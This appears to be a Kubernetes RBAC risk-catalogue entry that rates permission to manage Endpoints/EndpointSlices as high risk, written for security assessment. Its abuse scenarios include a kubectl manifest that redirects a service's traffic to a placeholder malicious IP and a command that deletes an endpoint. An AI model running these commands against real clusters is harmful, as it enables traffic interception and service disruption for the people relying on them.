Manage Endpoints or EndpointSlices in a namespace
NetworkManipulation
High
Overview
| Field | Value |
|---|---|
| ID | 1074 |
| Name | Manage Endpoints or EndpointSlices in a namespace |
| Risk Category | NetworkManipulation |
| Risk Level | High |
| Role Type | Role |
| API Groups | core, discovery.k8s.io |
| Resources | endpoints, endpointslices |
| Risky Verb Combinations | [create] · [update] · [patch] · [delete] · [get] · [list] |
| Tags | DenialOfService NetworkManipulation Tampering TrafficRedirection |
Description
Permits creating, updating, or deleting Endpoints/EndpointSlices for services within a specific namespace. This can lead to traffic redirection, denial of service, or network policy bypass for applications within that namespace.
Abuse Scenarios
- Create a new Endpoint to redirect traffic for a service in the namespace.
kubectl create -n <namespace> -f - <<EOF
apiVersion: v1
kind: Endpoints
metadata:
name: <service-name> # Must match an existing service name
subsets:
- addresses:
- ip: <malicious-ip-address>
ports:
- port: <service-port>
EOF
# Example: kubectl create -n default -f - <<EOF ... EOF (redirect 'my-app-service')
- Delete an existing Endpoint within the namespace, causing service disruption.
kubectl delete endpoint <endpoint-name> -n <namespace>
# Example: kubectl delete endpoint my-frontend-service -n default